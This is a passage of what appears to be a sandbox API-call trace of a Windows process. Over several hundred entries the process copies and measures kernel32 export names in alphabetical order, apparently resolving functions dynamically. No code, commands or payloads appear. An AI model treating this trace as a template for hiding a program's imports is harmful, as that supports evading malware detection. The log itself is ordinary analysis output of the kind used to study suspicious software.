lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.108] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.108] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.108] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.108] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.108] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.109] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.109] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.109] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.109] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.109] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.109] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.109] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.109] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.109] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.109] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.109] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.109] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.109] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.109] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.109] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.109] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.109] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.109] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.109] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.110] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.110] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.110] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.110] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.110] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.110] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.110] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.110] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.110] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.110] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.110] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.110] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.110] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.110] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.110] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.110] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.110] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.110] lstrlenA (lpString="COPYFILEA") returned 9 [0080.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.110] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.111] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.111] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.111] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.111] lstrlenA (lpString="COPYFILEW") returned 9 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.111] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.111] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.111] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.111] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.111] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.111] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.111] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.111] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.111] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.111] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.111] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.111] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.111] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.111] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.111] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.112] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.112] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.112] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.112] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.112] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.112] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.112] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.112] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.112] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.112] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.112] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.112] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.112] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.112] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.112] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.112] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.112] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.112] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.113] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.113] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.113] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.113] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.113] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.113] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.113] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.113] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.113] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.113] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.113] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.113] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.113] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.113] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.113] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.113] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.113] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.113] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.113] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.114] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.114] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.114] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.114] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.114] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.114] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.114] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.114] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.114] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.114] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.114] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.114] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.114] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.114] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.114] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.114] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.114] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.114] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.114] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.115] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.115] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.115] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.115] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.115] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.115] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.115] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.115] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.115] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.115] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.115] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.115] 